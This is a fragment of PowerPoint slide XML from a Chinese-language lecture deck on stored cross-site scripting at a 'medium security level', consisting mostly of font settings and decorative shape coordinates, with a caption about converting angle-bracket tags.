              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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存储型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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2.中安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="图片 31" descr="13"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="2209800"/>
            <a:ext cx="4296410" cy="3318510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="5638800"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图 10-31  对&lt;&gt;标签进行转换图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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8877300" y="5857875"/>
            <a:ext cx="3314700" cy="1000125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3314700" h="1000125">
                <a:moveTo>
                  <a:pt x="3314700" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1000125" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="951670" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903811" y="4578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856598" y="10222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="810086" y="18033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="764326" y="27959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719370" y="39946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675271" y="53944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="632081" y="69898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589853" y="87758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548640" y="107470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508492" y="128982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469464" y="152243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431607" y="177198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394974" y="203797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359617" y="231986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325588" y="261713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292941" y="292926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261727" y="325573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231998" y="359601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203808" y="394957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177208" y="431590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152252" y="469446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128991" y="508475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107477" y="548622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87764" y="589836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69903" y="632064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53947" y="675255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39949" y="719355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27961" y="764312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18034" y="810074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10223" y="856588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4578" y="903803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1153" y="951665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1000122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3314700" y="1000124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3314700"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3" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9186926" y="5424551"/>
            <a:ext cx="3005455" cy="1433830"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3005454" h="1433829">
                <a:moveTo>
                  <a:pt x="120209" y="1433448"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="89849" y="1374297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71583" y="1332494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55258" y="1289692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40930" y="1245945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28654" y="1201308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18486" y="1155837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481" y="1109588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4695" y="1062616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183" y="1014976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="966724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183" y="918471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4695" y="870831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481" y="823859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18486" y="777611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28654" y="732142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40930" y="687507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55258" y="643761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71583" y="600960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89849" y="559160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110002" y="518416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131985" y="478782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155744" y="440315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181223" y="403070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208367" y="367101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237120" y="332466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267427" y="299218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299233" y="267413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332481" y="237107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367117" y="208355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403086" y="181213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="440332" y="155735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="478799" y="131977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="518432" y="109995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="559177" y="89843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600976" y="71577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="643776" y="55254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687520" y="40926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732154" y="28652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777622" y="18485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="823868" y="10480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="870837" y="4695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="918474" y="1182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="966724" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3005074" y="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 name="Freeform 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="110680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 name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090612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 name="Freeform 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107346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 name="Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105727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 name="Freeform 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10429875" y="5648325"/>
            <a:ext cx="19050" cy="419100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="19050" h="419100">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="419100"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="381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9" name="Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102393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0" name="Freeform 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11482451" y="2908195"/>
            <a:ext cx="709930" cy="1092835"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="709929" h="1092835">
                <a:moveTo>
                  <a:pt x="0" y="1092304"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="949" y="1044230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="996637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="949562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="903040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="857107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="811799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="767150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="723198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="679978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="637525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="595875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="555064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="515128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="476102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="438022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="400924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="364843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="329815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="295876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="263062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="231408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="200950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="171723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="143764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="117109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="91792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="67849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="45317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658083" y="24231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698894" y="4626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="709549"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1" name="Freeform 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11482451" y="4000500"/>
            <a:ext cx="709930" cy="1092835"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="709929" h="1092835">
                <a:moveTo>
                  <a:pt x="709549" y="1092410"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="658083" y="1068174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="1047084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="1024547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="1000601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="975279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="948619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="920655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="891425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="860962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="829303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="796484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="762541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="727508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="691423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="654320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="616236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="577206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="537266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="496451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="454798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="412342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="369118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="325163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="280513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="235202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="189267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="142744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="95667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="949" y="4807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2" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11528170" y="3067176"/>
            <a:ext cx="388620" cy="439420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="388620" h="439420">
                <a:moveTo>
                  <a:pt x="388620" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="204470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373125" y="438912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38862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3" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1085850" cy="3133725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1085850" h="3133725">
                <a:moveTo>
                  <a:pt x="85725" y="3133724"/>
                </a:moveTo>
                <a:close/>
              </a:path>
              <a:path w="1085850" h="3133725">
                <a:moveTo>
                  <a:pt x="1085850" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3129904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37270" y="3132571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85725" y="3133724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134179" y="3132571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182040" y="3129146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229254" y="3123501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="275768" y="3115690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321530" y="3105763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366487" y="3093775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410587" y="3079777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453777" y="3063821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="496006" y="3045960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537220" y="3026247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="577367" y="3004733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616396" y="2981472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="654252" y="2956516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690885" y="2929916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726242" y="2901726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760270" y="2871997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="792917" y="2840783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="824131" y="2808136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="853859" y="2774107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="882048" y="2738750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908647" y="2702117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="933603" y="2664260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956864" y="2625232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="978376" y="2585085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998089" y="2543871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1015949" y="2501643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031904" y="2458453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1045902" y="2414354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1057890" y="2369398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067816" y="2323638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075627" y="2277126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081271" y="2229913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084696" y="2182054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085850" y="2133600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108585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4" name="Freeform 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553260" y="0"/>
            <a:ext cx="2360930" cy="1081405"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2360930" h="1081405">
                <a:moveTo>
                  <a:pt x="2360640" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2351430" y="74967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2343262" y="120902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2333376" y="166213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321806" y="210863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2308590" y="254818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2293762" y="298042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2277358" y="340498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2259412" y="382151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2239961" y="422966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2219041" y="462906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2196685" y="501936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2172931" y="540020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2147812" y="577123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2121366" y="613208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093626" y="648241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2064629" y="682184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034410" y="715003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2003005" y="746662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1970448" y="777125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1936776" y="806355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1902023" y="834319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1866226" y="860979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1829419" y="886301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1791639" y="910247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1752919" y="932784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1713297" y="953874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1672807" y="973482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1631485" y="991573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1589366" y="1008110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546486" y="1023058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1502880" y="1036382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1458583" y="1048045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1413632" y="1058012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1368061" y="1066246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1321905" y="1072713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1275201" y="1077377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1227984" y="1080201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1180289" y="1081151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1132593" y="1080201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085376" y="1077377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1038673" y="1072713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="992518" y="1066246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="946948" y="1058012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901997" y="1048045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="857702" y="1036382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="814097" y="1023058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="771219" y="1008110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="729101" y="991573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687781" y="973482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647293" y="953874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607673" y="932784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568956" y="910247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="531177" y="886301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494372" y="860979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="458577" y="834319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423827" y="806355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390157" y="777125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357603" y="746662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326200" y="715003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295983" y="682184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266988" y="648241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239251" y="613208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212807" y="577123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187691" y="540020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163938" y="501936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141585" y="462906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120666" y="422966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101217" y="382151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83273" y="340498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66871" y="298042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52044" y="254818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38829" y="210863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27261" y="166213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17376" y="120902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9208" y="74967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2794" y="2844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5" name="Freeform 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1962150" y="752475"/>
            <a:ext cx="400050" cy="409575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
